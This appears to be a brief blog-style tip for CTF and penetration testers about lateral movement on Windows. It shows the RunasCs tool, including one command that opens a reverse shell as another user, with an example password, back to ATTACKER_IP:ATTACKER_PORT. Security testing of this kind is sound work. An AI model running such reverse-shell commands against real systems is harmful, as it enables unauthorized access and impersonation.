During a CTF / RedTeam / PenetrationTest you might need to move laterally by impersonating another user.
On Linux (if you have valid credentials), you’d simply run:
su [username]
But on Windows, especially if you’re using a limited Shell, the built-in runas command often won’t behave as expected.
Enter RunasCs 🔥
The tool RunasCs simplifies this scenario, allowing you to spawn a reverse shell impersonating a specific user. For instance, to open a shell back to your attacking machine as user mr.anderson, you’d execute:
.RunasCs.exe mr.anderson Password1@ cmd.exe -r ATTACKER_IP:ATTACKER_PORT
Download: GitHub Repo
